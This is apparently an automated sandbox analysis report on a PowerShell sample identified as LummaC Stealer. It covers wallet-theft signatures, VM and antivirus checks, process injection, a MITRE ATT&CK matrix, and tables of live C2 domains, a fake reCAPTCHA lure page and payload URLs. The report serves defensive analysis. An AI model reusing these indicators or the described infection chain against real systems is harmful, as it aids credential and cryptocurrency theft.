                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: RegSvcs.exe, 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                  Source: RegSvcs.exe, 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tibnejdfjmmkpcnlpebklmnkoeoihofecuTronLinkvnkbihfbeogaeaoehlefnkodbefgpgknnwMetaMaskxfhbohimaelbohpjbbldcngcnapndodjpyBinance Chain Walletzffnbelfdoeiohenkjibnmadjiehjhajb{Yoroi|cjelfplplebdjjenllpjcblmjkfcffne}Jaxx Liberty~fihkakfobkmkjojpchpfgcmhfjnmnfpi
                  Source: RegSvcs.exe, 0000000C.00000002.59499668768.0000000002D26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: RegSvcs.exe, 0000000C.00000002.59499668768.0000000002D26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q1C:\Users\user\AppData\Roaming\Ethereum\keystore
                  Source: RegSvcs.exe, 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus Web3
                  Source: RegSvcs.exe, 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                  Source: powershell.exe, 00000000.00000002.58263213990.00007FFB4CA20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                  Source: Yara matchFile source: 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 9072, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts321
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		OS Credential Dumping2
                  File and Directory Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter                  		1
                  Registry Run Keys / Startup Folder                  		212
                  Process Injection                  		21
                  Deobfuscate/Decode Files or Information                  		LSASS Memory214
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts3
                  PowerShell                  		Logon Script (Windows)1
                  Registry Run Keys / Startup Folder                  		3
                  Obfuscated Files or Information                  		Security Account Manager421
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Screen Capture                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  DLL Side-Loading                  		NTDS2
                  Process Discovery                  		Distributed Component Object Model1
                  Email Collection                  		2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Masquerading                  		LSA Secrets331
                  Virtualization/Sandbox Evasion                  		SSH3
                  Clipboard Data                  		113
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts331
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items212
                  Process Injection                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1591695 Sample: 00.ps1 Startdate: 15/01/2025 Architecture: WINDOWS Score: 100 44 washyceehsu.lat 2->44 46 view-reserve.com 2->46 48 9 other IPs or domains 2->48 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Antivirus detection for URL or domain 2->60 62 7 other signatures 2->62 9 powershell.exe 11 2->9         started        signatures3 process4 signatures5 70 Found many strings related to Crypto-Wallets (likely being stolen) 9->70 12 mshta.exe 23 9->12         started        16 conhost.exe 9->16         started        process6 dnsIp7 54 view-reserve.com 92.255.57.120, 443, 49769 TELSPRU Russian Federation 12->54 86 Suspicious powershell command line found 12->86 18 powershell.exe 14 17 12->18         started        22 powershell.exe 17 12->22         started        24 powershell.exe 17 12->24         started        signatures8 process9 dnsIp10 50 92.255.57.112, 49770, 49771, 49772 TELSPRU Russian Federation 18->50 64 Writes to foreign memory regions 18->64 66 Injects a PE file into a foreign processes 18->66 26 RegSvcs.exe 18->26         started        29 RegSvcs.exe 1 1 18->29         started        31 conhost.exe 18->31         started        33 RegSvcs.exe 2 22->33         started        35 conhost.exe 22->35         started        68 LummaC encrypted strings found 24->68 37 RegSvcs.exe 24->37         started        40 conhost.exe 24->40         started        42 RegSvcs.exe 24->42         started        signatures11 process12 dnsIp13 72 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 26->72 74 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 26->74 76 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 26->76 78 Queries memory information (via WMI often done to detect virtual machines) 26->78 80 Found many strings related to Crypto-Wallets (likely being stolen) 33->80 82 Tries to harvest and steal Bitcoin Wallet information 33->82 84 Detected PureCrypter Trojan 33->84 52 steamcommunity.com 23.47.27.74, 443, 49773 AKAMAI-ASUS United States 37->52 signatures14

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  00.ps10%VirustotalBrowse
                  00.ps10%ReversingLabs

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://s.ytimg.com;0%Avira URL Cloudsafe
                  https://www.gstatic.cn/recaptcha/0%Avira URL Cloudsafe
                  http://92.255.57.112/1/3.png100%Avira URL Cloudmalware
                  https://go.microsoft.co0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmlkeq60%Avira URL Cloudsafe
                  bloodyswif.lat100%Avira URL Cloudmalware
                  https://view-reserve.com/recaptcha-verify.htmlYehItOKPCrVOrOVMGXyZZbKtNyrVXuwla0%Avira URL Cloudsafe
                  http://www.microsoft.cZD0%Avira URL Cloudsafe
                  http://92.255.57.112/1/2.pngin0%Avira URL Cloudsafe
                  curtainykeo.lat100%Avira URL Cloudmalware
                  https://view-reserve.com/recaptcha-verify.htmlJ0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmlH0%Avira URL Cloudsafe
                  leggelatez.lat100%Avira URL Cloudmalware
                  miniatureyu.lat100%Avira URL Cloudmalware
                  https://view-reserve.com/recaptcha-verify.htmlu0%Avira URL Cloudsafe
                  kickykiduz.lat100%Avira URL Cloudmalware
                  https://lv.queniujq.cn0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmllLMEM0%Avira URL Cloudsafe
                  https://view-res/recaptcha-verify.html0%Avira URL Cloudsafe
                  http://crl.micrd0%Avira URL Cloudsafe
                  http://www.protware.com0%Avira URL Cloudsafe
                  http://92.255.57.112/1/2.pngXzi0%Avira URL Cloudsafe
                  finickypwk.lat100%Avira URL Cloudmalware
                  https://view-reserve.com/recaptcha-verify.htmlINetCookies0%Avira URL Cloudsafe
                  shoefeatthe.lat100%Avira URL Cloudmalware
                  http://crl.microsoft.c0%Avira URL Cloudsafe
                  https://washyceehsu.lat/100%Avira URL Cloudmalware
                  https://view-reserve.com/recaptcha-verify.htmlTe0%Avira URL Cloudsafe
                  http://92.255.57.1120%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.html=0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmlC:0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmlll0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmlAPPT0%Avira URL Cloudsafe
                  https://view-reserve.com/0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmlYp?60%Avira URL Cloudsafe
                  http://92.255.57.112/1/1.pnghttp://92.255.57.112/1/2.png$TC=$TC.replace(0%Avira URL Cloudsafe
                  washyceehsu.lat100%Avira URL Cloudmalware
                  http://92.255.57.112/1/2.png100%Avira URL Cloudmalware
                  https://view-reserve.com/recaptcha-verify.html...100%Avira URL Cloudmalware
                  http://www.protware.com/0%Avira URL Cloudsafe
                  http://crl.comodo=0%Avira URL Cloudsafe
                  http://92.255.57.112/1/1.pngXzi0%Avira URL Cloudsafe
                  http://www.microsoft.$D0%Avira URL Cloudsafe
                  savorraiykj.lat100%Avira URL Cloudmalware
                  https://view-reserve.com/recaptcha-verify.htmlZe0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmlhttps://view-reserve.com/recaptcha-verify.html0%Avira URL Cloudsafe
                  http://92.255.57.112/1/3.pngXzi0%Avira URL Cloudsafe
                  https://broadcast.st.dl.eccdnx.com0%Avira URL Cloudsafe
                  http://pesterbdd.com/images/Pester.pngXzi0%Avira URL Cloudsafe
                  http://www.protware.com/70%Avira URL Cloudsafe
                  http://127.0.0.1:270600%Avira URL Cloudsafe
                  http://92.255.57.112/1/1.png100%Avira URL Cloudmalware
                  https://view-reserve.com/recaptcha-verify.htmlbej60%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.html100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  steamcommunity.com
                  		23.47.27.74
                  		truefalse
                    		high
                    view-reserve.com
                    		92.255.57.120
                    		truetrue
                      		unknown
                      finickypwk.lat
                      		unknown
                      		unknowntrue
                        		unknown
                        washyceehsu.lat
                        		unknown
                        		unknowntrue
                          		unknown
                          kickykiduz.lat
                          		unknown
                          		unknowntrue
                            		unknown
                            bloodyswif.lat
                            		unknown
                            		unknowntrue
                              		unknown
                              shoefeatthe.lat
                              		unknown
                              		unknowntrue
                                		unknown
                                savorraiykj.lat
                                		unknown
                                		unknowntrue
                                  		unknown
                                  miniatureyu.lat
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    curtainykeo.lat
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      leggelatez.lat
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://92.255.57.112/1/3.pngtrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        bloodyswif.lattrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        curtainykeo.lattrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        leggelatez.lattrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://steamcommunity.com/profiles/76561199724331900false
                                          		high
                                          kickykiduz.lattrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          miniatureyu.lattrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          finickypwk.lattrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          shoefeatthe.lattrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://92.255.57.112/1/2.pngtrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          washyceehsu.lattrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          savorraiykj.lattrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://view-reserve.com/recaptcha-verify.htmltrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://92.255.57.112/1/1.pngtrue
                                          • Avira URL Cloud: malware
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://player.vimeo.comRegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://go.microsoft.copowershell.exe, 00000006.00000002.58448102834.0000025BAFE9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.gstatic.cn/recaptcha/RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.microsoft.cZDpowershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C5914350094a33e2RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.youtube.comRegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.google.comRegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exeRegSvcs.exe, 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.58302816703.0000015E93DC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.58363019340.0000015EA2928000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B98D06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58417681738.0000025BA7B39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58415482636.000001999007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.000001998150D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://92.255.57.112/1/2.pnginpowershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://view-reserve.com/recaptcha-verify.htmlkeq6mshta.exe, 00000003.00000002.58302661231.00000248D9925000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287597229.00000248D9924000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://s.ytimg.com;RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://github.com/Pester/PesterXzipowershell.exe, 00000004.00000002.58302816703.0000015E92ADA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B97CEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.000001998022B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.58258386449.000002A33820C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.58302816703.0000015E928B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B97AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.0000019980001000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.58299585071.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.59499668768.0000000002EDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://steam.tv/RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://view-reserve.com/recaptcha-verify.htmlYehItOKPCrVOrOVMGXyZZbKtNyrVXuwlamshta.exe, 00000003.00000003.58289321335.00000250DC78D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://view-reserve.com/recaptcha-verify.htmlumshta.exe, 00000003.00000002.58302581442.00000248D98F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://view-reserve.com/recaptcha-verify.htmlJmshta.exe, 00000003.00000002.58307882392.00000250E1340000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://stackoverflow.com/q/14436606/23354RegSvcs.exe, 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.58302816703.0000015E92ADA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B97CEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.000001998022B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://view-reserve.com/recaptcha-verify.htmllLMEMmshta.exe, 00000003.00000002.58305312624.00000250DC6AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287043720.00000250DC6AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58283273648.00000250DC6AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.58302816703.0000015E92ADA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B97CEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.000001998022B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://go.micropowershell.exe, 00000004.00000002.58302816703.0000015E93773000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B98306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.0000019981142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://store.steampowered.com/privacy_agreement/RegSvcs.exe, 0000000E.00000002.58326106471.0000000000A96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://view-reserve.com/recaptcha-verify.htmlHmshta.exe, 00000003.00000002.58303534824.00000248DB3A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://contoso.com/Iconpowershell.exe, 00000008.00000002.58308550972.000001998150D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://crl.micrdpowershell.exe, 00000004.00000002.58382068499.0000015EAACB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://view-res/recaptcha-verify.htmlmshta.exe, 00000003.00000002.58302794613.00000248D996B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58280651620.00000248D996B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://sketchfab.comRegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://lv.queniujq.cnRegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.youtube.com/RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.58302816703.0000015E92ADA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B97CEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.000001998022B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.protware.commshta.exe, 00000003.00000003.58280651620.00000248D996B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58297265094.00000250DC56D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58278705202.00000250DCD85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58283273648.00000250DC6AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://92.255.57.112/1/2.pngXzipowershell.exe, 00000006.00000002.58310832394.0000025B97CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://stackoverflow.com/q/2152978/23354rCannotRegSvcs.exe, 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://view-reserve.com/recaptcha-verify.htmlTemshta.exe, 00000003.00000002.58302661231.00000248D9925000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287597229.00000248D9924000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.google.com/recaptcha/RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://checkout.steampowered.com/RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://view-reserve.com/recaptcha-verify.htmlINetCookiesmshta.exe, 00000003.00000002.58302794613.00000248D9936000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58280651620.00000248D9933000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://crl.microsoft.cpowershell.exe, 00000000.00000002.58260917690.000002A350242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://washyceehsu.lat/RegSvcs.exe, 0000000E.00000002.58326106471.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      http://www.quovadis.bm0powershell.exe, 00000000.00000002.58260917690.000002A3501FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287043720.00000250DC675000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.58305312624.00000250DC675000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58283273648.00000250DC673000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.58382068499.0000015EAAC2F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58448102834.0000025BAFE64000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58457730531.00000199FF448000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.59532094818.00000000053E0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://92.255.57.112powershell.exe, 00000004.00000002.58302816703.0000015E92ADA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B97CEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.000001998022B000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://view-reserve.com/recaptcha-verify.html=mshta.exe, 00000003.00000002.58302581442.00000248D98F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://92.255.57.112/1/1.pnghttp://92.255.57.112/1/2.png$TC=$TC.replace(mshta.exe, 00000003.00000003.58288335780.00000250DC785000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58289154956.00000250DC789000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58288981238.00000250DC787000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58288807681.00000250DC786000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://view-reserve.com/recaptcha-verify.htmlllmshta.exe, 00000003.00000002.58307053628.00000250DCD96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58283494904.00000250DCD95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58278705202.00000250DCD85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://store.steampowered.com/;RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://community.cloudflare.steamstatic.com/RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exeRegSvcs.exe, 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://contoso.com/Licensepowershell.exe, 00000008.00000002.58308550972.000001998150D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://steamcommunity.com/(RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://view-reserve.com/recaptcha-verify.html...mshta.exe, 00000003.00000002.58305312624.00000250DC6AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287043720.00000250DC6AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58283273648.00000250DC6AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  		unknown
                                                                                                  https://aka.ms/pscore6powershell.exe, 00000000.00000002.58258386449.000002A3381BA000.00000004.00000800.00020000.00000000.sdmpfalse
